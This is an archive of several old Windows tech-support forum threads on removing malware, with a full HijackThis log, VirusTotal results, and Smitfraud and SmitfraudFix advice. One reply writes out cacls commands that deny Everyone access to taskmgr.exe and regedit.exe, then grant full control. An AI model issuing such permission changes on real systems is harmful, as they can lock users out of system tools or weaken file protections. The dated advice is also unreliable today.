Dear Sir,

The instructions for the Malware Removal Guide indicate that I need to access the Add and Remove Programs feature in the Control Panel. My Control Panel doesn't have this feature. What should I do?

Thank you.

Frances Donner

In Vista and Windows 7 the Add/Remove applet has been renamed. It is now called: Programs and Features

Thank You.

Quote from: Donner on January 09, 2011, 12:33:54 PM

Thank You.

How were you able to get rid of the redirect virus? What steps did you take?
Dear Sir,

I cannot figure out how to save the HJT log file. I do not know how to put it into Note Pad. All the steps I have followed appear to have eliminated the virus. Do you still want the logs or can I just list my problem as solved?

Thank you.

Frances Donner
3279.

Solve : BSoD from mofunzone.com, HJT log- any problems??

Answer»

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\ati2evxx.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\SiteAdvisor\6066\SAService.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Apoint\Apoint.exe
C:\WINDOWS\system32\Atiptaxx.exe
C:\WINDOWS\System32\WScript.exe
C:\WINDOWS\system32\PRISMSVR.EXE
C:\PROGRA~1\Yahoo!\browser\ybrwicon.exe
C:\PROGRA~1\Yahoo!\YOP\yop.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Java\jre1.6.0_01\bin\jusched.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\SiteAdvisor\6066\SiteAdv.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\2Wire Wireless\Client Manager\CMTWO.EXE
C:\Program Files\2Wire 802.11g Wireless\PRISMCFG.exe
C:\PROGRA~1\Yahoo!\browser\ycommon.exe
C:\Program Files\Apoint\Apntex.exe
c:\progra~1\Support.com\client\bin\tgcmd.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Evan ******\My Documents\My eBooks\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://red.clientapps.yahoo.com/customize/ie/defaults/sb/sbcydsl/*http://www.yahoo.com/search/ie.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://red.clientapps.yahoo.com/customize/ie/defaults/sp/sbcydsl/*http://www.yahoo.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://dsl.sbc.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://att.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://red.clientapps.yahoo.com/customize/ie/defaults/su/sbcydsl/*http://www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://red.clientapps.yahoo.com/customize/ie/defaults/sb/sbcydsl/*http://www.yahoo.com/search/ie.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://red.clientapps.yahoo.com/customize/ie/defaults/sp/sbcydsl/*http://www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://att.yahoo.com
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {089FD14D-132B-48FC-8861-0048AE113215} - C:\Program Files\SiteAdvisor\6066\SiteAdv.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\PROGRA~1\Yahoo!\Common\yiesrvc.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O2 - BHO: SidebarAutoLaunch Class - {F2AA9440-6328-4933-B7C9-A6CCDF9CBF6D} - C:\Program Files\Yahoo!\browser\YSidebarIEBHO.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dll
O3 - Toolbar: McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Program Files\SiteAdvisor\6066\SiteAdv.dll
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint\Apoint.exe
O4 - HKLM\..\Run: [AtiPTA] Atiptaxx.exe
O4 - HKLM\..\Run: [ZTgServerSwitch] c:\program files\support.com\client\lserver\server.vbs
O4 - HKLM\..\Run: [CleanupProgram] C:\Sonysys\cleanup.exe
O4 - HKLM\..\Run: [PRISMSVR.EXE] "C:\WINDOWS\system32\PRISMSVR.EXE" /APPLY
O4 - HKLM\..\Run: [YBrowser] C:\PROGRA~1\Yahoo!\browser\ybrwicon.exe
O4 - HKLM\..\Run: [IPInSightMonitor 01] "C:\Program Files\SBC Yahoo!\Connection Manager\IP InSight\IPMon32.exe"
O4 - HKLM\..\Run: [YOP] C:\PROGRA~1\Yahoo!\YOP\yop.exe /autostart
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [osCheck] "C:\Program Files\Norton AntiVirus\osCheck.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_01\bin\jusched.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SiteAdvisor] C:\Program Files\SiteAdvisor\6066\SiteAdv.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - Global Startup: 2Wire Wireless Client Manager.lnk = ?
O4 - Global Startup: 2Wire Wireless Client.lnk = C:\Program Files\2Wire 802.11g Wireless\PRISMCFG.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
O4 - Global Startup: Adobe Reader Synchronizer.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe
O4 - Global Startup: ColorPlus Startup.lnk = C:\Program Files\PANTONE COLORVISION\ColorPlus\ColorPlus.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra button: AT&T Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\PROGRA~1\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - OPTIONS GROUP: [INTERNATIONAL] International*
O14 - IERESET.INF: START_PAGE_URL=http://www.sony.com/vaiopeople
O16 - DPF: {1239CC52-59EF-4DFA-8C61-90FFA846DF7E} (Musicnotes Viewer) - http://www.musicnotes.com/download/mnviewer.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\common\yinsthelper.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1128543930945
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1173815626024
O16 - DPF: {D18F962A-3722-4B59-B08D-28BB9EB2281E} (PhotosCtrl Class) - http://photos.yahoo.com/ocx/us/yexplorer1_9us.cab
O18 - Protocol: siteadvisor - {3A5DC592-7723-4EAA-9EE6-AF4222BCF879} - C:\Program Files\SiteAdvisor\6066\SiteAdv.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\ati2evxx.exe
O23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Symantec Settings Manager (ccSetMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Symantec IS Password Validation (ISPwdSvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\isPwdSvc.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: SiteAdvisor Service - McAfee, Inc. - C:\Program Files\SiteAdvisor\6066\SAService.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe
O23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
O23 - Service: Symantec AppCore Service (SymAppCore) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
O23 - Service: YPCService - Yahoo! Inc. - C:\WINDOWS\system32\YPCSER~1.EXE

I replaced my last name with ****** if that makes a difference

I have a couple of errands to run and another log to deal with, but I'll look at yours ASAP. If you happen to see this before I get back, could you please post another full log with the heading and everything? It's alright if you want to censor your last name.

Well, Evan, your log looks clean to me. There's just one questionable entry I see...

O4 - HKLM\..\Run: [ZTgServerSwitch] c:\program files\support.com\client\lserver\server.vbs

It's related to Sony Vaio Support. It's technically legitimate, but it's also considered spyware. Whether you want this on your computer or not is up to you. I would delete it, but if you do, I think it may disable your support agent. So, like I said, it's up to you.

Whatever your problem is, I don't believe it's virus-related. You may want to take this issue over to the Hardware section because I believe your problem may be hardware-related. Describe your problem to them and include all STOP errors you get and I'm sure they'll have plenty of helpful suggestions for you.


Also...do you have a firewall on this computer? I don't see one active.

Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.

3280.

Solve : virus svichosst.exe?

Answer»

why u all guy dont want to help me n my friend? am i done anything wrong in this forum?

No ....well er..........

Quote from: insertusername on May 13, 2007, 08:53:40 PM

why u all guy dont want to help me n my friend? am i done anything wrong in this forum?
Get a legal copy of Windows and we'll help. Of course, if you did that, you might not be having these problems.

are u sure is pirate windows? if i change it,
can u sure that svichoost virus will not inflect to my windows again??
i ned to make sure frist,
how to know is pirate windows or not?

http://www.microsoft.com/resources/howtotell/ww/windows/default.mspx

i see, my this pc windows is a pirate windows...

so.. stil can help me or not? cos my arnother laptop with original windows still same problem ....

Start\Run
cmd
cacls "%systemroot%\taskmgr.exe" /e /g everyone:f
cacls "%systemroot%\REGEDIT.exe" /e /g everyone:f
If that doesn't work try formatting your computer with a legal copy of windows!

One more thing:
What software have you installed, or either downloaded last time?

Quote from: patio on May 11, 2007, 08:28:55 PM
I was -207 on Karma and all my installs are legit...

I don't get it.

And I kept giving you attaboys.

Quote from: Ledio on May 14, 2007, 07:41:03 AM
The best thing to do is:
Start\Run
cmd
cacls "%systemroot%\taskmgr.exe" /e /g everyone:f
cacls "%systemroot%\regedit.exe" /e /g everyone:f

I'm curious to what this advice will accomplish...

haha : ) my computer is okay. i already know how to enable back the task manager, regedit and folder options.


thank you all of you.
At the risk of repeating myself...i will.

Quote from: patio on May 14, 2007, 07:28:10 PM
Quote from: Ledio on May 14, 2007, 07:41:03 AM
The best thing to do is:
Start\Run
cmd
cacls "%systemroot%\taskmgr.exe" /e /g everyone:f
cacls "%systemroot%\regedit.exe" /e /g everyone:f

I'm curious to what this advice will accomplish...
hey patio try this first:
Start\Run
cmd
cacls "%systemroot%\taskmgr.exe" /e /d everyone
cacls "%systemroot%\regedit.exe" /e /d everyone
try to open regedit and task manager.
See what happens?
now do this:
cacls "%systemroot%\taskmgr.exe" /e /g everyone:f
cacls "%systemroot%\regedit.exe" /e /g everyone:f
and the programs will be OK


3281.

Solve : Need help, Norton 360 messed up?

Answer»

My Norton 360, which I am growing to hate more by the day, has somehow detected and "fixed" 2500 "risks" on my hard drive during a full scan. After this I now am unable to play certain games without my PC Freezing and restarting, or just plain freezing.

I have checked and system recovery and system restore are not working, and sadly my backup disks are missing. Friends have suggested reformatting harddrive and then reinstall OS, but as you can see this is part of the problem. I just want to be able to play my games again and not have Norton screw me over yet again.

Here is some of my PC Specs via direct X diagnostic (dxdiag.exe)

OS: Windows XP Home Edition (service pack2)
Processor: Intel Pentium 4 CPU 3.06Ghz
Memory: 1536 RAM
Video Card: Nvidia GeForce 6600 GT 128mb
DirectX Version: 9.0c

I have run Disk Defrag and Error check, installed free AVG software and scanned, nothing has helped yet. Plz help me

It's possible that perhaps important files were infected and removed, thus causing problems with your games. Does Norton have a list of all of the risks it cleaned? I haven't used Norton in years, but I'm sure it must have some sort of virus vault. This may prove to be helpful.

Although I wouldn't advise doing so just yet, if/when you want to remove Norton, we have a helpful guide.

Do you have a genuine Windows CD? If so, then perhaps you can try going to Start > Run and then type in sfc /scannow (note the space) and hit Enter. This will require the Windows CD.

Also, be sure to update your video card drivers.

Ok well windows CD is a no go unless it is decided to magically disappear on me or never came with the HP PC I got from Bestbuy over 3 years ago. If norton vaulted them how would i locate them? I have not been able to find them thus far.

I have ordered recovery disks from HP, hopefully this will solve my issues, I will let you all know then

I'm not exactly sure where you might find it, but you can try Tools > Quarantine. I know older versions of Norton used to have that. Just check everywhere for mention of a Vault or Quarantine and see if you can get a list.

Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.

3282.

Solve : results after scans with 6 programs?

Answer»

It's not nice but my pc has picked up 50 odd viruses

As we speak still scanning for them but here's a little screenshot from super anti spyware.

50 spywares would be more common than 50 different virii.

You might be ahead to just reinstall everything to start fresh. Do you have a real Windows CD, if needed?

Sorry ... can't see any screenshot.

However, SUPERAntiSpyware is excellent. It should help clear out much of the malware.

What program is telling you that the computer has 50 viruses?

If you are still having trouble download a self-extracting copy of HijackThis from here …….

http://downloads.malwareremoval.com/hijackthis_sfx.exe

Save it to your Desktop.

Double-click on the file hijackthis_sfx.exe file and it will self-extract into its own folder ……

C:\Program Files\HijackThis

Go to this folder and run the hijackthis.exe file.

From the menu click on "Do a system scan and save a logfile".

Copy and paste both the HJT logfile to this thread. More specific removal instructions will follow.

[EDIT > or you can do as the Man says above]


OJ

And i forgot(in the other post):
How AVG's do you have?
What did other AVG's results say?

what other programs do you have?? look at my signature

Quote from: GX1_Man on May 17, 2007, 02:33:42 AM

50 spywares would be more common than 50 different virii.

You might be ahead to just reinstall everything to start fresh. Do you have a real Windows CD, if needed?
GX is right!
All those threads may cant be cured
Reformat your system drive
Or better ALL OF YOUR DRIVES
3283.

Solve : rundll32.exe_tobedeleted?

Answer»

Got some spyware, whatever, I was running through my System32 files as I noticed some odd file next to rundll32.exe, it was called rundll32.exe_tobedeleted and it really scares the living crap out of me.
What's this odd thing? What will happen if I touch it? Will it delete the real rundll32.exe or what? What if I deleted it?

what programs did you use to scan your computer??


upload the file to virustotal

and post the log

DKsupern00b ...... You recently had a trojan on that pc didnt you ?
did anyone help you to remove it ?
Please let us know.

dl65

Got it scanned but apparently it got stopped during the scan, this was what I got out of it though:

AhnLab-V3 | 2007.5.9.0 | 05.09.2007 | no virus found
AntiVir | 7.4.0.32 | 06.14.2007 | no virus found
Authentium | 4.93.8 | 06.14.2007 | no virus found
Avast | 4.7.997.0 | 06.13.2007 | no virus found
AVG | 7.5.0.467 | 05.08.2007 | no virus found
BitDefender | 7.2 | 06.14.2007 | no virus found
CAT-QuickHeal | 9.00 | 06.14.2007 | no virus found
ClamAV | devel-20070416 | 05.09.2007 | no virus found
DrWeb | 4.33 | 06.14.2007 | no virus found
eSafe | 7.0.15.0 | 05.08.2007 | no virus found
eTrust-Vet | 30.7.3718 | 06.14.2007 | no virus found
FileAdvisor | 1 | 06.14.2007 | No threat detected
Fortinet | 2.85.0.0 | 06.14.2007 | no virus found
F-Prot | 4.3.2.48 | 05.08.2007 | no virus found
F-Secure | 6.70.13030.0 | 05.09.2007 | no virus found
Ikarus | T3.1.1.7 | 05.09.2007 | no virus found
Kaspersky | 4.0.2.24 | 06.14.2007 | no virus found
McAfee | 5053 | 06.14.2007 | no virus found
Microsoft | 1.2503 | 06.14.2007 | no virus found
NOD32v2 | 2329 | 06.14.2007 | no virus found
Norman | 5.80.02 | 06.14.2007 | no virus found
Panda | 9.0.0.4 | 06.14.2007 | no virus found

Aditional Information
File size: 33280 bytes
MD5: 5763e6224286473b771b234476c6538c
SHA1: 423c80fb7bd2f00cff87889d6599f2ba43ca2a09
Bit9 info: http://fileadvisor.bit9.com/services/extinfo.aspx?md5=5763e6224286473b771b234476c6538c

Are these results sufficient?

Also yes I did get a lot of Trojans, however I assume they have all been removed, currently I'm just trying to replace files that have been damaged and remove files the trojans might have left behind.

I'm using a-squared to scan for Viruses, just updated it a few hours ago. Also just scanned and took down whatever spyware I might've had with Ad-Aware 2007 just updated and Spybot Search and Destroy.

Also for some reason I cannot enter my Internet Options, it gives me an error message stating I can't enter them because I have insufficient permissions and tells me to contact the System Administrator, but I'm the Admin!

This is also why I said I only assumed them all to be gone, I'm suspecting 1 to be left.

Currently my Explorer.exe or at least what I believe is the problem is acting rather peculiar. At random occasions programs in my taskbar will blink as if it was just opened/updated or as if I just received a message through IM. I believe it is completely unrelated however, it's just another problem I'd like to make you guys aware of.

Also I'd like to add I keep getting an error message about wuauctl.exe I believe, can't remember, I'm not home atm, using a friend's computer. It tells me the program executed an error and has to end. I know it's related to Windows Update.

Third problem I'd like to add, the final virus/trojan I haven't been able to kill because I weren't able to enter my Internet Options, a rather poor attempt from another program trying to convince me into thinking it's an anti-virus device of sorts, however that is fairly unbelievable, especially with a name like "Ultimate Defender", simply sounds too generic or simplistic for me to believe in it, I keep exiting the program but every time I get the wuauctl.exe this fake anti-virus thing tries to run again and I exit it.

The last and 5th problem (in total) is that I keep getting messages from Internet Explorer telling me it is redirecting to a new site even though IE is not active, I noticed however the top of a window on my screen with the following URL on it:
http://www.directporta.info/drivecleaner/8/
This is why I wanted to enter my Internet Options so I could set this page as one of the untrusted and keep my IE from entering it by blocking it somehow if that is even possible.

I'm aware I'm requesting a whole lotta help here, I must also apologize for the awkward explanations I give things, but thanks in advance, even if we don't get it fixed.

get superantispyware update it and scan in safe mode.. you got a browser hijack, thats why you get redirected.. can you upload a screenshot of the balloon you get about the fake program..

Can't take a screenshot but here's a pic from Google: http://www.newfreedownloads.com/imgs/12636-w400.jpg

Mine looks like that, however before it goes into action it asks me first lol, that's where I quit it. My biggest concern is that I don't know how to make it stop.

How do I fend off a browser hijack, and is it even possible to do so? Also would it help to uninstall and reinstall IE?
I also got Opera and Firefox installed just in case one or another dies.

Ultimate Defender is listed as a rogue spyware app....get rid of it.

As I said in some of my earlier posts Patio,
I know it is some evil stash,
I know I have to remove it,
however as I also said I have no idea HOW to remove it.

Btw these wuauctl.exe error messages are really appearing a lot now.

Have you attempted to remove it in safe mode with system restore turned off ? ?

I would re-run all your scans this way as well...

DK, scan with HijackThis and post a log for us to look at.

rundll32.exe_tobedeleted is likely left over from a virus removal program, but there's definitely still something up with your computer.

I'm moving this thread to Viruses/Spyware section.

I can't remove Ultimate Defender because I can't locate its .exe file, if I knew where it is I could've killed it easily, however the .exe file is probably named something totally unrelated in order to protect itself.

Also would it help to uninstall and reinstall IE to fend off the browser hijack?

Quote

Also would it help to uninstall and reinstall IE to fend off the browser hijack?

AFTER you get everything cleaned up, get spybot s&d, update it, then use the immunize function.

how did you try to locate UD?? my computer> hhd> program files> UD folder

or

add/remove programs??

try

Ccleaners tools function its under the issues part

Ok guys, really serious business this time.

I brought my Hard Disk to work and scanned it with their virus scanner, it deleted some viruses stored in system32,
when I got home and set the Hard Disk back in my computer and started it it went haywire in Windows.
It told me a file named drvfeg.dll was missing, now I checked on Google and stuff which gave no search results. But I'm not sure if it was called drvfeg.dll, however a lot of the things that were supposed to run in my taskmanager under processes were missing. In the beginning the Task Bar was visible but only in Classic Windows skin, and after a few reboots it only showed half of the Task Bar with no icons in it.

I can't continue until this problem has been resolved, please tell me there is a way to fix it so we can go on.

You have SmitFraud...at the very least. That dll is part of the infection.

Is your Taskbar the only thing affected by this missing dll? Are you still able to boot into Windows at all? If so, please download SmitfraudFix (by S!Ri) to your Desktop.

Double-click SmitfraudFix.exe
Select option #1 - Search by typing 1 and press "Enter"; a text file will appear, which lists infected files (if present).
Please copy/paste the content of that report into your next reply.

**If the tool fails to launch from the Desktop, please move SmitfraudFix.exe directly to the root of the system drive (usually C:), and launch from there.

Note : process.exe is detected by some antivirus programs (AntiVir, Dr.Web, Kaspersky) as a "RiskTool"; it is not a virus, but a program used to stop system processes. Antivirus programs cannot distinguish between "good" and "malicious" use of such programs, therefore they may alert the user.
http://www.beyondlogic.org/consulting/proc...processutil.htm




Along with that, I would also like a HijackThis log. Also...I would advise against hooking up your hard drive at work. If you're not careful, you can spread the infection.
3284.

Solve : Correction for Ruthie B.?

Answer»

I asked for help on PPCTL component & I have XL NOT WINDOWS 2000

3285.

Solve : Help with anti-virus.?

Answer»

I am buying a new computer and I was thinking about getting Norton but I heard that it takes up too much memory. I was wondering if there is a really good anti-virus that doesn't take up too much memory and gets the job done. Other than AVG.. My hero!

AVG is amazing.
And free.
Use that.
At least, that's my advice.

Ok. it's just i don't know about the norton situation. Do you agree with me that it makes your computer slower. The plus side of it, is that I get it for free with my internet. Plus the firewall anti-spyware Etc...

Yeah, ditch Norton.
Go with AVG and a different firewall (I recommend Comodo but I've heard good things about Sunbelt, Kerio(same thing? Not sure) and Jetico).
They're free and won't slow your PC down as much as Norton, plus can give better protection.

Thanks.

I'd go with Calum's advice. Even if you can get Norton for free, I still wouldn't use it. Its protection is often subpar and yes, it does take up a lot of resources on some machines. Most people who switch from Norton to AVG notice a huge difference.

Quote from: Calum on June 10, 2007, 02:35:56 PM

I've heard good things about Sunbelt, Kerio(same thing? Not sure)
Sunbelt makes Kerio, so yeah, they're basically the same thing.

Quote from: CBMatt on June 10, 2007, 06:43:19 PM
Quote from: Calum on June 10, 2007, 02:35:56 PM
I've heard good things about Sunbelt, Kerio(same thing? Not sure)
Sunbelt makes Kerio, so yeah, they're basically the same thing.
I thought so but I wasn't sure, thanks for clarifying.

Agreed on the Norton thing. It's a resource hog and sometimes a little inefficient.

Some choices for free protection with links .....

Free AV.....

AVG > http://free.grisoft.com/doc/1

Avast > http://www.avast.com/eng/avast_4_home.html

Antivir > http://www.free-av.com/antivirus/allinonen.html

**Comodo > http://www.antivirus.comodo.com/ [AV in beta only as at 13.5.07]

AntidoteLite >
http://www.vintage-solutions.com/English/Antivirus/Super/index.html

Clamwin > http://www.clamwin.com/



Free F/W …..

Zone Alarm > http://www.zonelabs.com/store/content/catalog/products/sku_list_za.jsp?dc=12bms&ctry=US&lang=en&lid=nav_za

Sygate > http://www.simtel.net/product.download.mirrors.php?id=53687

Sunbelt Firewall (formerly Kerio) > http://www.sunbelt-software.com/Home-Home-Office/Sunbelt-Personal-Firewall/

**Comodo > http://www.comodo.com/products/free_products.html

Jetico > http://www.jetico.com/index.htm#/jpfirewall.htm

m0n0wall > http://m0n0.ch/wall/
(I’ve heard good things about monowall but it takes some setting up, I believe)

Smoothwall > http://www.smoothwall.org/

Tiny Personal > http://www.webmasterfree.com/tpfw.html

Outpost > http://www.agnitum.com/products/outpostfree/download.php



OJ
3286.

Solve : Dell E-Mail Spoof?

Answer»

Quote

Websense Security Labs has received reports of a new email campaign starting in Australia that attempts to lure users to connecting to a malicious website. The Australia CERT has reported emails that are spoofing the Dell online store. The emails claim that the user is being charged for a camera purchase and requests they connect to a site in order to view their profile. The site is encoding there code via Java Script which decodes to 8 different IFRAMES, all which attempt to load exploit code and download and install new malicious code...

Article

1. Use Firefox
2. Use Noscript
3. Use Firefox with Noscript

(DUH!) lol
3287.

Solve : What are the different ways??

Answer»

I'm in a bit of a weird situation and I need to know the different ways that would be possible to hack into a nexopia account. There is this girl who is threatening me and my friend. She is telling my friend that she will hack into my nexopia account and delete it. She proved she can cause she hacked into his account and left him a msg. She doesn't even know him and he didn't give anything away about his password, how could she have and be doing this???

-Melissa-

I'm not that familiar with nexopia (never heard of it, actually), but I'm guessing that it should probably keep your password information secure. Below are two possibilities:

Your hacker (how do you know it's a she?) could have simply guessed your friend's password if it was easy enough (i.e. password, 123, their name). Or maybe your hacker could've downloaded some password cracking program (there are some out there, if you look hard enough...).


If in doubt, just get your friend to change his password, and if the hacker still gets into the account, they probably have a program to do so (or maybe even a keylogger, which is dangerous...)

Contact the site owners and change your account...

Suggest the same for your friend as well...

I know it's a girl because she was talking to me and she has about 500 pics of herself. So wouldn't it be kind of pointless to change our accounts or passwords or anything like that if she has one of these programs? And I thought that key loggers had to be manually put into the computer?

If I were you...I'd simply change the password on your account using various alphanumeric characters....capital letters...numbers...

This will make it extremely difficult for someone to access your account simply by trying to guess your password. Keyloggers only work if your computer is infected with one.

Play it safe...update your operating system...your malware protection...your firewall...and stay on top of these things.

Another thing...never...ever open any email from someone you don't know...even if you do know who it is...are you expecting an email from them? Any attachments to your email that just don't seem right? Most importantly...if you use an email program like Outlook Express, Outlook, etc., etc....never use the Preview Pane feature.

Better safe than sorry.

But how can someone infect your computer with a key logger? And better yet how do you get rid of the key logger?

Quote

And I thought that key loggers had to be manually put into the computer?
Quote
But how can someone infect your computer with a key logger?
Just visiting a site or even connecting to the internet with insufficient protection can get you infected.
Quote
And better yet how do you get rid of the key logger?
With decent protection.
Check the security FAQ section for more details.

Oh, and - that's not hacking.

K perfect guys, thanks for your help:)

-Melissa-

You're welcome, Melissa.
3288.

Solve : Help please, my computer is acting funny?

Answer»

Game.exe (the file that represents Diablo, Starcraft, or Warcraft) has the highest usage when I'm in a game and the lagging occurs. However, if I'm in the channel, the usage goes down to about 5k or so, yet I still have the lag spikes occurring while in the channel.

OK.

Does a look at Task Manager or Process Explorer help pinpoint any other process(es) that may be adding to lag?


OJ

both MSN Messenger and AIM take 20k+(aim 20 or so, msn 30 or so)
those are really the only ones that take up large amounts of space.

However, I have played without either of those running and still encountered lag spikes.

**EDIT** Cleaning it with a can of compressed air worked. Thanks guys. **/EDIT**

3289.

Solve : Error message " Error Creating Key."?

Answer»

Hi,
running Windows XP, Service Pack1, installed Antivirus-Ashampoo. while the user logon i am getting the message "Error Creating Key." only the problem in user logon not in Administrator Logon.

help me,


sneha

[cleaning up - attachment deleted by admin]

Why don't you have Service Pack 2?

Did this problem happen before or after you installed Ashampoo?

How long has this been happening? Have you tried System Restore?

Hi,

how to go to system restore? i have to take any backup before give system restore? the problem was started only after created users. i tried SP2 also, again the same problem. the dialog box is coming continuously in the desktop.

Sneha
To use System Restore, navigate to...

Start > Programs > Accessories > System Tools > System Restore

Choose "Restore my computer to an earlier time" and click on Next. Then choose a date from before this problem started. And no, you don't have to backup your file. You may, however, have to reinstall any programs that were installed after that date. If System Restore doesn't fix your problem, you can undo the process.


Did you try deleting the user accounts you created?

Respected Sir,
I tried system restore in XP, but i am getting the same error, and i am getting the same error on windows 2000 & 2003. there is no option in user logon system restore.

i never tried to delete the user account


Sneha
You have three operating systems loaded on this computer? Maybe I'm wrong, but perhaps that could possibly create a conflict.

Because this started when you created a user account, perhaps you should try deleting the account and see what happens.

the three OS are in different machines

You're having this problem on three different computers? Or are you referring to System Restore? Keep in mind that 2000 and 2003 don't have the System Restore feature.


